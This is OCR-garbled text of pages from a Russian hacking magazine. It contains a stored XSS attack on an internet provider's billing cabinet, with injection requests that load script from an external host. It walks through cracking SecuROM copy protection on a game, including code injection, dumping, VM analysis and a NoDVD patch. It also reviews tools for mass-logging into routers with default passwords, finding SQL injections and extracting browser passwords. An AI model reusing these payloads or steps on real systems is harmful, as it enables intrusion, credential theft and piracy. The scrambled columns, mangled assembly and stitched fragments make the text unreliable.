
каб ин е т, я решил поискать

2012-02·02 03:02

100 .00

qOOO

2012-02-02 03 :02

100.00

qOOO

А КАК ЖЕ

XSS? XSS.

Потратив достаточно времени

на п о и с ки , я н е нашел уязвимых мест [так мне тогда казалось]. Однако дальше, взглянув на раздел под названием <<Контактная

и нформация >> , я у видел , что у каждого из трех полей l<<e-mail>>, <<Тел е фоны >> и << Телефон для SМS-уведомлениЙ>>] есть кнопка

История перевода средств

для редактирования. Телефоны, это понятно, должны иметь

очевидную фильтрацию цифра/не цифра, но вот поле

<<e-mail >>

вп о лне может с одержать в себе ба г. Я попробовал прот о лкнуть простой код:

xjxfun•saveE mail&xjxr• 1328363403426&xjxargs[]•TEST xjxfun=saveTel&xjxr=1328363361153&xjxa rg s[)=eeeeeeeeeeee xjxfun=saveSMS Tel&xjxr=1328363389834& xjxargs[ )-eeeeeeeeeeee

<script src• "http: //***/ o.js" type• "text / javascript " > </script>

Открываю переменную хjхг, составляю GЕТ-запрос, выполняю его и проверяю- все работает, значе ния сохраняются. Теперь не­

много изменим запрос сохранения

Естественно, все это дело спровоцировало ошибку <<Введен нек о рректный

e-mail>>.

Хорошо, возвращаюсь к

IE

/cl ient.php ?x jxfun •save Email&xjxargs(]• cscript src•"http:// ***/o . js" type•"text / javascript" </script>

г о ворит << ieH ПPH eadeгs>>:

POS T /client.p hp

e-m ail'a:

и смотрю, что мне

НТТР / 1 . 1

В

o.js находится обычный aleгt["XSS"];. Выполняю- успех!

Мо й ядо в итый текст успешно был сохранен. Дал ее я решил обновить главную страни ц у личного кабинета и с разу же ув идел вы ск очивший aleгt. Что может быть лучше активной

XSS

на гл ав­

н ой с транице личного кабинета любимого nровайдера? Однако эт ого мне было мало, необходимо добить еще два поля. Вот что я с д е лал:

• / client .php? xj xfun=saveTel&x j xargs [)=eeeeeeeeeeee cscript src•"http:// ** */o.js " type• "text/javascript" > </ script> • / client .php? xj xfu n=saveSMSTel&xjxargs [)=eeeeeeeeeeee cscript src• "http: //* **/o.js" type• "text /ja vascript" > </ script>

_S ERVERiREQUE S T_ Щ.IE 1

РНР

~

ISteeiGevfXa]

02

'

Llcense

+ д*""'"'

~т·~

Пркв11Т,Оаеtеn 8 Гл.аона11

Р

Снова все успешно! Видимо, разработчики не рассчитывали на

Фаitлы

то , что кто-то допишет их код. Здесь следует учесть, ч т о макси­ -._·•to~.

мальная длина кода, который возвращался на страни ц е, составля­

··•-·• .,.., ... . ., ..

ла

260

символов, так что три уязвимых поля были весьма кстати .

подводя итоги Уже nозже от сотрудников !Т-отдела я уз н ал, что некоторые фай­ лы с айта не редактировались с

2008

года. Убогий код с огромным

количеством уязвимастей остался как наследие от работавших ранее программ истов.

Как такой биллинг работал в течение долгого времени, я пред­

ставляю с трудом. Но теnерь еще больше уверен, что детские уязвимости в виде полного отсутст вия nользовательского кода встречаются повсеместно, даже если речь идет о серьезных комnаниях , которые имеют дело с личными данными пользова­

телей и их денежными средствами. К счас ть ю, текущая коман да nрограммистов быстро исправила все ошибки на сайте. :Х: Отображаем п роизвольные страницы через активную

ХАКЕР

XSS

067

04/159/20 12

www.epidemz.net


elf licq: 77191161 cj licq: 37083071

взлом

Если ассоциировать SecuROM

v7.33 .17 с танком Абрамсом без динамической защиты,

OllyDbg

-с гранатометом РПГ-7, а

X-

code injection- с кумулятивной гранатой для гранатомета, то, как и в реальности,

такой выстрел навзничь

ВНЕДРЕНИЕ Х-КОДА

И ВИРТУАЛЬНАЯ МАШИНА: ТЕОРИЯ И ПРАКТИКА ВВЕДЕНИЕ

Ищи на диск е :

Полную

версию данного исследования;

• SecuROM 7 Profiler v1 .0; Материалы по работе SecuROM

7

&VM ; • Исходники X- code

injection lt x t-Ьinl ; • Видео «X-code injection в действии! »

на сумасшедшую «популярность»

Secu ROM

во

прошьет броню этой тяжелой

Стратегия Tibeгium Waгs до сих пор явля-

всем мире, в нашей стране редко когда можно

неповоротливой машины

ется одной из самых популярных игр се рии

услыша т ь о нем публично [ exelab.гu в расчет не

и достигнет поставленной цели

-

ОЕР. Выведенную из строя

машину изучают Российс кие инженеры

...

Commaпd

& Сопquег

от н ебезызвестной

ко н торы E lectгoпic Aгts. Последняя лояльно относится к Sопу

берем!. В первую очередь это объясняется на­ личием своего звездного протектора, но если

Sопу после н ескольких судебных ра збира­

Digital Audio Di sc Согрогаtiоп [SONY DADCI, чью мать вспоминают, когда очередная игрушка, запротекченная SecuROM,

тельств отказалась от услуг нулевого кольца,

просит вставить оригинальный диск. Несмотря

пользоваться низкоуровневыми функциями,

то ребята из Pгotectioп Techпology продолжают

ХАКЕР

068

www.epidemz.net

04/159/2012


Тибе р иум н ый реверс ин г

пр ограммах, которые соз д ают н еnрия тн ости их

п родуктам. П рисоедин и ться к процессу тоже

Windows NТ \С u гге ntVe rsi оп\ Wi п d ow5 \Ар р 1п it. Так вот, наша задача- перехватить управ­

н ельзя- он просто завершится. Впрочем, эта

ление в нужном месте и по казать адрес воз­

г адость действует только н а время проверки

врата, чтобы в нужное время присоединиться

д и ска. Н еnлохо! Для меня т о гда это озна ч ало,

к процессу. П очему я иду таким путем? Как уже

что ближайший месяц О Е Р и рабочий дамп я

было упо м януто выше, вся проблема состоит

точ н о не увижу. Конечно, спустя несколько ме­

в том, что разработчики прекрасно осведом­

сяцев я не хуже разработчиков знал, что и как

лены о любых программах, которые создают

ра бо т ает в

проблемы их продуктам. Этот факт несложно

SecuROM 7.33.

Причем вся линейка

7.3 х практически идентична, особенно это ка­

проверить, прослушав

сается виртуальной машины [самое заметное

в исследуемом протекторе. Механизмы меж­

изменение: <5расе

for гепt> в более поздних «You Аге Now Eпteriпg а

FiпdWiпdow

CreateFile,

процесснога взаимодействия- вчерашний

версиях заменено на

день; передовой способ борьбы с наворочен­

Re5tricted Агеа>>]. Но сейчас у меня только один

ными защищалками-не п осредственное

отладчик и никакой надежды выйти победи­

внедрение в целевой образ защищенной про ­

телем такого серьезного врага, над созданием

граммы. Обнаружить его на порядок сложнее,

которого трудились весьма не глупые люди.

ведь в этом случае мы используем ресурсы

самого протектора. Д абы противостоять такому

ФИЛОСОФИЯ ВЗЛОМА

На м д а ли зе л е ны й с в е т! Снима е м дамп !

раскладу, прежде всего вводят проверку

Пробить навесную броню и доехать до ОЕР

целостности файла [динамическая защита]. Ту

тупым ковырянием в отладчике- слишком

самую, которая отсутствует в нашем случае [чем

где абсолютным чемпионом по вызову являет­

долго и неэффективно. Будем бить в бортl

я, собственно, воспользовался]. Едем дальше.

ся

П ервая дыра в защите не заставила себя

Я уже сказал, что для компиляции

долго искать: я сразу заметил, что протектор

использован

одна арена для битвы- прикладной уровень.

не проверяет целостность всего файла. Ну, не

что и cпc3game.dat откомпилирован тем же ком­

И, естественно, они приложили максимум

то чтобы совсем не проверяет, нечто подобное

пилятором. Точка входа выглядит как :

усилий для обеспечения надежной защиты ..

имеется, но вот только идет оно как правер-

KeBugCheckEx. Таким образом у разработчиков осталась

которая была пробита, разобрана и демонти­

ка участков и направлена, прежде всего, на

рована:].

выявление программных точек останова [так

004628DA 004628DF

С++

Microsoft

7.0.

CNC3.exe

А ведь очевидно,

CA LL 00478488 JMP 004626FA

называемый <<перекрывающий код>>]. Она мне

WHAT 15 TARGET

никак не мешала, поэтому в практическом

Реально точка входа находится по

Сначала определимся с нашим инструмента­

плане это означает, что возможно внедрение

операнду прыжка -

рием. Собственно, понадобится сама игруш-

Х-кода в образ файла статическим путем.

по адресу

ка

Строго говоря, Х-код- это осмысленная со­

занимается, и я ее всегда игнорирую. Однако

для снятия дампа-

004626FAh.

004784B8h

Функция

ничем полезным не

Tiberium Wars [с последним патчем 1.9], OllyDbg 1.10 с OllyDmp [собственно как дам пер] и OllyDbg 2.0 без

вокупность байт, внедренных посторонним

в ней мы находим, что она вызывает не­

лицом или про г раммой в целевой код процесса

сколько API [GetSystemTimeAsFileTime,

каких-либо плагинов. Несмотря на такой столь

с целью выполнения определенной задачи.

скромный набор, в нашем случае работать можно с одним отладчиком, а основным

оружием будет ассемблерный код. Но прежде

Различают следующие типы:

GetCurreпtProce5sld ... l. Для нас это означает только одно: если в

1. On-line patching . Через WiпAPI Rе а d Р го се 55 М е m о ry/W г i te Р го с ess М е m о г у

GetSystemTimeAsFileTime

внедрить Х-код, который перехватит уnрав­ ление и покажет нам адрес возврата, то у нас

всего ответим на вопрос, какой исполняе-

читаем/пишем в адресное пространство

мый файл требуется загрузить в отладчик.

процесса. К примеру, таким образом, ставят

в окрестности ОЕР и снять рабочий дамп, при

Переходим в папку с установленной игрой.

флаг регистрации в

условии, что после распаковки стартовый

Первым на глаза попадается безобидный

AsPack

CNC3.exe: судя по точке входа, откомпили­ рован Microsoft С++ 7.0, стандартные секции .text, .rdata ... Правда, если его запустить, нас

с распаковкой. Однако современные про­

И хотя

текторы типа

некоторых значимых WiпAPI, этот список

вежливо попросят вставить оригинальный диск. Извините, имеется только

Tools

Daemon

с образом, поэтому возникает вполне

NtExplorer

под эгидой

2.11с, чтобы не заморачиваться

Themida

не дают доступ в свое

адресное пространство.

2. Offline patching . И ли

статический патчин г.

будет замечательная возможность попасть

код действительно на своем законном мес т е.

SecuRO M 7.33

проверяет пролаги

весьма неполон, плюс сама проверкаидет

только в самом начале. Вот тебе и следую щ ий

Собственно, наш случай, когда ничто не

недочет! Теперь пора собрать нашу куму­

мешает nисать прямо в исnолняемый об­

лятивную гранату. Место для базирования

нормальное желание развязать четвертую

раз и перехватывать в нем управление.

я выбрал в конце секции

тибериумную драку и, в ко н це концов, о т о­

Обнаружить такого <<Wтирлица>> у себя

к сборке- написанию а5m-кода, который

драть проверку диска от nро г раммы. Так как я

в тылу протекторам на порядок сложнее .

самостоятельно выполнит всю работу. Весь

был знаком с предыдущими играми из серии

При необходимости одурачивают защиту,

Сп С, то знал, что

делая оригинальную копию исполняемого

CNC3.exe

играет роль обертки

и прос т о через WiпAPI Create P гocess запускает

файла и через GetCommandline/Get FilePath

нужный файл с расширением .dat [на са м ом

возвращают ссылку на него.

деле обычный

Microsoft Р Е Е Х Е format] с нуж­

3. 011-hijacking . С

.e5t

и приступил

ОСНОВНОЕ ''ГЛАВНОЕ" ХРАНИЛИЩЕ

VM

(СПЕЦИФИКАЦИЯ) Г

учетом того, что nри загруз­

Xl~AIIHЛHЩE

/1РЕС В

IM

Ni!l

б"'- OI I IO'AHДЬI

JMP

EЛXt fШII

АРГУМf:НТВ JI З •вл·н,J ~АПРОСОВ"'

DЛЛГИ СОСТОЯНИЯ

(EFI)

ными параметрами. Несложно догадаться,

ке образа первыми получают управление

что искомая цель - \Retai1Exe\1.9\cпc3game.

динамические библиотеки, записанные

dat. Грузим в отла д чик упомянутый файл и по секции .securom понимаем, с чем имеем дело. F9 ... Милое окошко с надписью « Н е уд алось

в его таблице импорта [точнее, функция

OЬBl-Pl КЛ

DII Mainl, то мы первыми получаем бразды

В:<ОЛ, В •ХРЛIШJШЩF.

правпения над защитой и успеваем скрыть

запустить требуемый модул ь безопас н ости>>.

себя задолго до работы навесной брони.

ts 0/), В 9ИРТУЛ..7IЬl 1 УЮ МАIШНIУ RUJ-J;лrrr RХОЛ В ~rJIЛRIIOEo: Х1'АНИЛШ111:·'•

8111'1 }.~;JЬJIOJ"O

СПКА

Rl_о:РХУШКЛ С'J' IШЛ {SТЛСК POINTF.H)

.artPm., ~ ~tД.ЕIIНЫЙ I.OCK ВУТ& ВХОД 8 "'XPAIIИJIИПtE Nt2"' 11 OI'fV\_ДJISI XPЛIIIOIHЯ ПРОМЕЖ}"ТОЧНЫХ

ДЛH II hiX

И~ПОЛЬЗУЮТ .,ОСТРОВКИ~ ВО ВРЕМЯ РАБОТЫ

Еще раз его мож н о прочитать, ес л и запустить любой А Р I-шпион, Ргос М оп ... Одним словом,

Напоминаю, что для быстрой загрузки можно

разработчики прекрасно осведомлены о всех

прописаться в HKLM\Software\Micro5oft\

ХАКЕР

04/159/ 2012

Понимание главного хранилища является ключевым для в з лома алгоритмов работы вирт у альной машины

069

www.epidemz.net


взлом

1!Ш3

код состоит из двух частей. Первая доста-

• Ьit. l y/x~i B~f -

вит саму гранату на место: заменит пролог

GetSystemTimeAsFileTime

на безусловный

англоязычная статья

по виртуальной

переход ко второй части. Собственно, в этом случае получаем управление из распаковщи­

02906ЕЕВ

ка [определить мес т о которого неслож но, по­

029D6EEE 02906EF1 02906EF3 029D6EF5 02906EF8 029D6EFE 029D6F 01 029D6F 03 029D6F05 029D6F08 029D6F ОА 029D6F OD 02906F OF 02906F12 02906F14 029D6F17 02906F19 029D6F1B 029D6F1E 029D6F21 029D6F28 029D6F2A 029D6F2D 029D6F3 О 02906F33 029D6F35 02906F38 029D6F3D

ставив точку останова на секцию .textl и туда же его воЗвратим после того, как переход бу­ дет установлен. Кстати, первоначально, чтобы

получить доступ на запись в секцию kегпе132.

text [дело было на висте), я офлайн на 2k3 через PeTools устанавливал атрибут Wгite, пересчитывал контрольную сумму ... и ведь работало! Способ весьма дурной, учитывая, что есть WiпAPI ViгtuaiPгotect, но нестандарт­

ные подходы иногда тоже на руку. Переходим ко второй части нашего представления.

П ервоечередной задачей здесь является по­ каз адреса возврата и удержание управления

до прибытия на место отладчика. Я реализо­ вал свой алгоритм, который переводит

large

integeг в ACSIIZ-cтpoкy [об ltoa я тогда не знал), а задачу показа и удержания управле­ ния элегантно решил с помощью

MessageBox,

но затем уnравление nередается обратно в

WinAPI.

Впрочем, для показа можно нагло

использовать функционал самого протектора

CгeateThгead с адреса т ом

-

OOF9ADOE,

но это

непроизводительно. Итак, граната собрана, поnробуем! Монтируем мини-дамп. Запускаем игру. Нас интересуют все

MessageBox nосле OODDCE77, 76 В 41404, 7С34207В, 0040А5А Е ... Сто-ооп l П оследний, да ведь вызов идет из секции .text l We need attach nowl Присоединяемсяк процессу альгой 1.10, проверки:

которая с дам nером, и переходим по послед­

нему адресу . Невероятно, но мы остановились

практически в ОЕР [точка входа расположена по адресу 0040А2С7). Немноги м позже, когда виртуальная машина [VMI стала более-менее

029D6FЗE

029D6F40 029D6F45 02906F46 029D6F48 029D6F 48 029D6F4E 029D6F51

0343 8870 04 8800 89С2

10 81Е 2 FFOOOOOO 0053 10 89F2 D2CA С1С2 08 D2CA С1С2 08 D2CA С1С 2 08 8А48

AOD NOU NOU 1101) NOU AHD ADD

машине SecuROM 7.30. Я нашел эту

PTR PTR PTR

публикацию ко гад уже завершал исследование , но

тем nриятнее было увидеть , что в целом наши выводы

совпали . Однако в статье структура

~101) ED X, ESI ROR DL,CL ROL EDX, ROR DL,CL ROL EDX, ROR DL,CL ROL EDX, 02СА ROR DL,CL С1С2 08 ROL EDX, 8906 NOU ESI,ED X t•10U ED X,EAX 89С2 С1ЕА 18 SHR ED X, 8 013493 ADD DWORD PTR DS:[EDX•4+EBX] ,ESI 8143 04 08 0000 ADD D\~ORO PTR DS: [Е8Х+4] , 8813 NOU PTR DS: (ЕВХ] ADD 03 53 о с PTR DS: [Е8Х+ОС] С 1ЕО 10 SHL ЕА Х , С1Е8 18 SHR ЕАХ, oocs ADD AL,CL PUSH DWORD PTR DS:[EAX•4+EDX] FF3482 ~101) ЕАХ, 88 01 000000 PUSH ЕВ Х 53 OFA 2 CPUID 25 DF FF FF FF AHD Е АХ, РОР ЕВ Х 58 88С1 NOU CL , AL NOU EAX, DWORD PTR DS:[E8X+OC] 8843 ос D30C24 ROR D\·IORD PTR SS : (E SP] ,CL 010424 ADD D\·IORD PTR SS :( ESP] , EA X РОР ЕА Х 58 FFEO ЕАХ

Оптими з ируя скорость работы вирт уа льн о й машины, в обф у с к ации один из остров к ов!

VM излагается в несколько ином виде , да и некоторы х

аспектов работы

VM

я не увидел .

• Ьit.lylxG9 L ry NoDVD для СпСЗ: Tiberium Wars v1.9. Отличительной

особенностью является пристроенная

в секцию

.mem-

агу вирт у альная

машина . В стать е в з ят в кач е ств е основного

при мера . Новичкам рекоменду е т с я нач а ть с н е го .

SONY DADC решили оставить без

изучена, было сделано еще одно умашоки­

рующее открытие [снова просчет команды из SONY DADCI- попасть в О Е Р можно

В итоге не выигрываем ни в размерах дампа,

с ювелирной точнос т ью и nри этом еще более

ни в быстродействии.

безопасным путем. И как вы думаете, что

этому помогло?

SecuRO M v7.33

Viгtual

Machine,

В общей сложности на nолный разбор

чья задача- наоборот защищать от взлом­

полтора я поnросту копалея во всем без

щиков, но никак уж не nомогать имl

разбору, пока не «догадался >> начать ис­

SECUROM V7 VIRTUAL MACHINE

VM

ушло около двух месяцев, причем первые

MOV DWORD PTR DS: [E BX+0C ],EDX MOV ВУТЕ PTR DS: [E BX+10], 95 MOV DWORD PTR DS:[ EBX+14], EBX MOV DWORD PTR DS:[EBX+lC] ,ESP Код, приведенный выше, с потрохами выдает

следование с самого начала цепочки- и вот

главное хранилище, которое играет ключевую

тут началось ... Сама

роль в

SecuROM v7.3x VM

по

VM.

Разберешься в переменных и вобла­

существу не является виртуальной маши­

сти хранения nромежуточных данных- считай,

с готовым образом добраться до ОЕР и снять

ной в привычном представлении, никакой

что

дамn- по факту дело нескольких минут,

ас м-код там не эмулируется. Все куда проще:

видно, что по существу здесь все наштамповано

матерых взломщиков это никак не остановит.

по существу nроцедура с двумя аргументами

методом copy/paste. В-третьих, сумасшедшее

Навесная защита бессильна, значит, выход

[LPDWORD и VOIDI и тремя вариантами работы.

количество закономерностей вплоть до исполь­

один- сделать максимально неработоспособ ­

Ну а дальше остается только удивляться.

зования регистров

ным дамп! Следуя этой логике, большинство

Во-первых, чтобы понять, как оно работает,

что один из островков находится без обфускации

не хочет заморачиваться с

Инженеры

Sony DADC

как в воду глядели:

VM

на

90% взломана!

CPU

Во-вторых, стало оче­

на островках. А тот факт,

просто внимательно изучи nервый островок

-вообще убило! Единственное, что здесь ре­

ее сложную структуру, в ко т орой нереально

[кусок кода от sрin-блокировки до JMP EAXI,

ально доставляет, это RОL-байт lcгypt-bytel, так

разобраться за приемлемое время, и предпо­

который, как ни странно, выполняется всегда,

как без знания того, какие точно матоперации

читая дампить всю выделенную виртуальную

и всегда первый.

с ним выnолняют все

VM,

nрописывая

к

VM,

и приваривают ее в виде отдельной сек­

REP STOS DWORD PTR ES:[EDI ]

<< MOV Е АХ, 1; CPUID; >> инструкцию «MOV AL, CURRENT_CPUID_K EY_ DELTA_DECODE >> и проделать оное еще 254 раза.

островков виртуальной

автоматизированную ломалкуиснять все за

раз. Собственно, кому хочется пони мать, о чем

ции, предварительно догадавшись вставить

nосле конструкции

255

машины, невозможно построить кулхацкерскую

память, и имеющую, и не имеющую отношение

MOV DWORD PTR DS:[EBX+4],EAX MOV EAX,DWORD PTR SS:[ESP] MOV DWORD PTR DS:[EBX+8],EAX

все-таки идет речь- читайте полный вариант

статьи на диске или на нашем сайте. Следующий

воnрос- реально ли отодрать

VM оттибериума?

ХАКЕР

070

www.epidemz.net

04/159/20 12


Тибериумный реверсинг

Интуиция подсказывает, что более чемl Я уже успел проболтаться, что вариантов работы три.

Начнем с последнего [способ

NQ2], собственно

нумерующихся по мере их появления в за­

щищенной программе. Способ

NQ2

полностью

61'1 0111Hif>OЗ

6А 6А

IJ111)0(>()/

U11Dfl ... f)9

0111)11(,[1

:) ..

II110IJM3 111101161 •• 11111)1161 ., IJIIDIIIoLR IJ111Hit>ll

so

IJI!OU(>I 1 1111Dfll'>l n

работы алгоритмами, представленными в виде

111"100611

двух процедур'С двумя аргументами, которые

отрабатывают друг за другом . В первом заносим

любое число [например, 1], второй- ссылка на массив ключей [offset OOB93AFC], которые копи­ руются в стек

На выходе в ЕАХ получается

VM.

что-то типа закодированного числа [0790А442], которое было передано в первом аргументе.

Если это закодирован н ое число [0790А442] скор­ мить в первый аргумент алгоритма обратного хода, то на выхо д е в ЕАХ мы получаем ту же

1,

при условии, что массив ключей был одинаков

[offset OO B93AFC]. Короче, имеем две функции,

[ l_yp<i'

capt;Jo" Tl.":><t: lou ...... ,

FE09 .. CO : : p l

0WOMO

PTR

0

O S: ~USEH3 2 .1~ ~~UoxAJ

::~~~~;:::1

UIIDII"IНI

:

O'I OE OFB6 59

07

. А · ~

~:~~:~~~~

~~~~~~~~~

>

~~~~~i~~ 1 01100/22

UI!OH/:.>/1

,.

.. .. ЕО

P US H 1\iAX ..1111' S lttllll

118

00

01 IOun;•o 1)1 1011/?1

>

1 01100/21 (JI11)1J.f:JOol n11D07:19I 1!111>11/:111'

68

lt1101J 72.,

Hl}f' но о С2071001

PU S H 1.11 t0117C :.> PUS H AO

Enx ,E:nx

33СО

хон

АО

Е806 1001

ОЕ

ЕОО6100 1

::~~ :~i ~~~~ 0 =~~ 0 0 S: 0.10B6Цt_J

8F

00891 001

85 81

I IOU

EO I

, IJ"II OB91НJ

зu

~~~: ~~~ , ЕСХ

30

1-IDU

CL.,

XO R

I!OX

33С9

U110D/ЗO

,ЕОХ

lti!OU.f:JI

1111DJI/Iol

~ :·tP s ~~R~ L. o ·t10U 76 6

01100/'o:J 1111011/ ...,

"

U S ER3 2. 11 e!<!1 Age80XA

00

EUB61 001 3 1 00 0 00000 IJUUUUUOU 00 000000

:~~~~~~: [ ~

Ul 100/"7 111108/>on

HUL L HUL.L.

ЕВ

01100111

~: ~~~~~~

:~~ н En X PU S H PU S H

U111)U6Гa

завязан с двумя противоположными по логике

PU $ H

UD (Ht

~~1 5

UI11)0(>0A

, " 11>1161 о

IШ_UK jiiU_ I CO H RSfER 1 SK jiii.I_DEFI:IUTTOH1 jiiO_RP I 'LIIUUAL

.. 0

:~

01 !0060 .. 11110Jit>0'•

~ ::~ ~ ~~HI

>

'.' ' ~

n ••r:

SecuROM v7.33 .017

~ IIOHl

111"1 001"1 011QU I .. I

и не пр е дставляет, какими серьезными последствиями гро з ит внедренный Х-код

дающие в сумме нулевой эффект. Собственно, роль

VM

в них такова: в первом случае крышуют­

ся асм-инструкции

MOV MOV MOV AND MOV

GetModuleFileNameA, DeleteFileA, GlobaiFгee. Обращение к VM в этом случае всегда ознаме­ новывается CALL ЕА Х, информация черпается

43 Е 2АВ9 0] упрятанные данные. Наиболее эффективное решение.

ЕАХ,

DWDRD PTR 55: [ЕВР+8) DWORD PTR D5 : [ECX) DWORD PTR 55: [ ЕВР+0С)

десятка вызовов- смело выдираем и ставим

ЕАХ,

ЕСХ

нормальные вызовы

ЕСХ,

ЕАХ

блемным является самый первый способ [по

В остальных случаях все обходится прямым

причине сумасшедшего количества вызовов­

вызовом

ЕСХ,

ЕСХ,

Во втором- инструкция

NOP

по известным смещениям в таблице импор-

та. В общей сумме в дампе набралось около

в перенос н ом

смысле. Прич ем прийти к этому выводу можно и без вскрытия

VM,

просто сравнив две упомя­

нутые процедуры [обратного и прямого хода]. Следующие в списке способы-

NQ1A

и

NQ1.

Они похожи, но с той лишь разницей , что первый после выхо да из в запрашиваемую

VM переносит нас WinAPI, а второй - в за ­

прашиваемую внутреннюю функцию [к слову,

около

1.

WinAPI.

Наиболее про­

1Ok]. Тут два варианта:

VM

без второго зле мента в ц епочке.

Суть в том, что инструкция

но требуется перетыкать все возможные

железнодорожной стрелки. П ервый раз, когда

меню, да и вообще пройти чуть ли не всю

вызывается внутренняя функция, <<стрелка>> пе­

игру. В отличие от <<Косынки>> и <<Пасьянса>>

реведена на

- верный способ убить время с пользойl

происходит заправка упомянутых выше двух ар­

2. Зная структуру всех 255 островков [на самом деле в способе NQl участвуют около 50], по сигна т уре базы запросов написать на С++ программу, которая ищет все базы за просов , затем строит всю цепь работы

Скрытых

VM

полный список: SetUnhaпdled E xceptionFilteг,

PTR ОS:[перемещаемый адрес] -7 база за­ -7 JMP [VM_VIR TUAL_ADDR ESS] -7 VM.

проса

JMP DWORD PTR ОS:[перемещаемый адрес] играет роль

всего- операция с резервированием стека]. не так уж и много, вот не­

NQl является пере­ VM: CALL ANY_OFFS ET -7 JMP DWORD

Дампить. Прос тая техническая реализация,

это может быть о дна асм-инструкция, чаще

WinAPI

Особенностью способа ход к

и в нужном месте виртуального стека

вытаскивает и дешифрует [XOR SecгetDATA,

VM, а

точнее- в базу запросов, где

гументов для виртуальной машины [LP DWORD и VOIO]. В процессеработы VM извлекает адрес запрашиваемой функции и ставит его как перемещаемый адрес- стрелк а переведена! После выхода из

VM происходит

переход в нашу

запрашивае мую функцию, ну а после первого вызова все, кто будет ее вызывать, попадают сразу куда нужно. Как видишь, оп тими зация! Кстати, количество и н струкций, которые выполняются за один прогон виртуальной ма­ шиной в способах Зk, зато способ

NQl и NQ1A, колеблется около NQ2 бьет все рекорды- ЗОk.

При чем островок без обфускации принадлежит именно последнему с п особу. Финишная работа с дампом включает перестроение в нормальный вид секции кода, удаление ненуж н ых и посто­

ронних внедрений типа

0044F4D2 0044F4D8 00482DE5 00482DEF

DEC DWORD PTR D5 : [158297A ) JE NODVD. 00482DE5 MOV DWORD PTR D5: [158297A ), 18D JMP NODVD. 0044F4DE

Последним пунктом отсылаем дамп в Sопу

DAOC.

На этом тибериумная драка заканчива­

ется.

ЗАКЛЮЧЕНИЕ В заклю чени е я просто поблагодарю

DADC

SO NY

за ее действительно интересный про­

дукт [для хакеров в частности ] ! Д о встречи на ОЕР на горизонте!

ХАКЕР

VM

под контролем

страницах][. ::Х::

xD

071

04/159/2012

www.epidemz.net


взлом

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ

Ав т ор :

__ ---· ------__ --... -----

slider URL: bit.ly/yMgi86

__

............

,, ....

Сист ема :

"nix/win

"'

,...••'--"'.J

ADSL-POYTEPOB BVSCANNER

Автор :

garinn URL: ripper.zuB.ru

The SX Team URL: bit.ly/htBkrs

Система :

Сист е м а:

Windows

Windows

.."."..

~-

МАСС-ХЕК ВМЕСТЕ С

Автор:

....

=

.......

'

ЛЕГКИЙ ПОИСК И РАСКРУТКА

ВОССТАНАВЛИВАЕМ ПАРОЛИ ОТ БРАУЗЕРОВ

SQL- ИНЪЕКЦИЙ

BVScanneг [Biack Vlastelin Scanneгl - это

П рограмма SQLRippeг- зто продвинутый

маленький, но крайне интересн ый скрипт

и удобный инструмент, предоставляющий

все свои [или не совсем свои

на Регl'е. Он nозволяет с ка нить за д анные

мощные, гибкие и очень простые в исполь­

сер вис ов. Эти парали ты предварительно на

диапазоны адресов н а nредмет наличия

зовании функции для поиска и анализа

протяжении долгого времени сохранял в своем

в них ADSL-poyтepoв . В nроцессе скана nрога

SQL-инъекций на осно ве БД

б раузер е. Каким же образо м их добыть? Конеч­

MySQL

и

Представь такую ситуа цию: внезапно ты забыл

MSSQL.

парали от веб­

но, можно погуглить и най т и множ ество раз ­

nробует войти в обнаруженные раутеры с nо­ мощью дефолтных лагинов и па ролей. Если

:1

Возможности nрограммы :

личных утилит непонятного происхождения,

но есть способ лучше ' П редставляю теб е за ­

вход удался, то все найденные у ч етные записи

поиск относительных и абсолютных ссылок

выводятся на экран и записываются в файл

на страницах;

мечательный софт под си мволичным на з вани­

accounts.txt.

задание максимального количества найден ­

е м Вго wsег Pa sswoгd Dе сгурtог. Данная прога

ных ссылок на странице;

может легко и просто восстанавл ив ат ь па ро ли

Заnуск скриnта крайне тривиален:

проверканайденных ссылок на SQL-ошибки;

и з следующих браузеров: Fiг e fox, lп tе гп еt

perl bvscan ner.pl

определение количества п олей в S ЕLЕ С Т­

Ехрlогег,

> П ервый

IР - диа п азо н

запросе с помощью операторов

О ре га Вг оwsег,

>В тор ой

I Р - диапа зо н

ORDER

ВУ,

Google Chгome, Google Chгome Сапагу, Apple Safaгi, Flock Вг оwsе г.

GROUP ВУ. UN ION SEL ECT; точное определен ие п олей вывода;

Возможности и особенности софтины :

возможность замены пробелов и коммента­

commaпd-liпe и GUI -ин терфейсы в комплекте;

поточным, за очень короткое время можно

риев на аналоги в случае наличия

восстановлен и е па ролей любой длины

легко получить просто огромное количество

сохране ние промежуточных результатов

и с л ожности;

аккаунтов. В результате успеш н ого ска н а

парсинга в файл

ав т оматическийпо и с квсех подд ерживае ­

и получения доступа к учетке злоумышленник

чтение струк туры базы данных и ее со хран е­

мых браузеров;

может сделать следующее :

ниевХМ L-файл;

функционал сортировки и редактирования

• Кстати, так как сканер является много ­

IDS;

.dbl;

изменить параметры учетной записи и ли

вы грузка произвольной таблицы и сох ран е­

найденных па р олей;

настройки модема;

ни е ее в

сох р анение результатов в HTM L/X ML/Text;

.dbl.

программа представлена в РогtаЫе­

продолжить целевую атаку внутри сети;

Хотя программа и обладает интуитивно­

создать

п онятным интерфейсом, но тем не мен ее

варианте, что исключает необходимость ее

п редлагаю тебе просмотреть обучающий ролик

установки.

PPTP-V PN

на модеме, п одключ и ться

к нему и снифать трафик в открытом виде; перепрошить модем, предварительно

[bit .ly/ydHA2o ] с описанием основных ее фич,

Пример использования утилиты из команд­

внедрив в образ разный ядовитый соф т,­

а также с л едить за всеми обновлениями на

например, те же самые сниферы .

официальной странице утилиты.

ной с троки: Brow serPasswordDe cry ptor .exe <output_fil e path>.

ХАКЕР

072

www.epidemz.net

04/159/ 2012


X-Tools

Автор :

[;;] С=\ Windows \system32 \cmd.exe С : ' tools >PindDorr~ain s .ехе http:// 216.239.59.104 http://gfe - gu . google.com http: / /\·1\·m .google. сот l1ttp:/ /<·l<m .google. de http://google.fr http:/ /googlea>•t}l.de http://google.it http://google.e s http: //google.de http: // www.google.co.uk

\·1\·1\·1 -

google. со1Т1

Mesut Timur URL: code.google.co m/p/ finddomains

Find Doma ins- это nолезнейшая

димо получить идентификатор Bing

Сист е ма:

вещь д ля пентестеров. Данная прога

Developeгs. Сделать это можно тут:

*nix/win

пр едстав л яет из себя многопоточный ный для раскрытия доменных имен,

binged.it/6Acg5 , а nолученный ID н еобхо дим о в ставить в файл appid . txt, находящийся в корне папки про­

сайтов и виртуальных хостов, кото­

граммы.

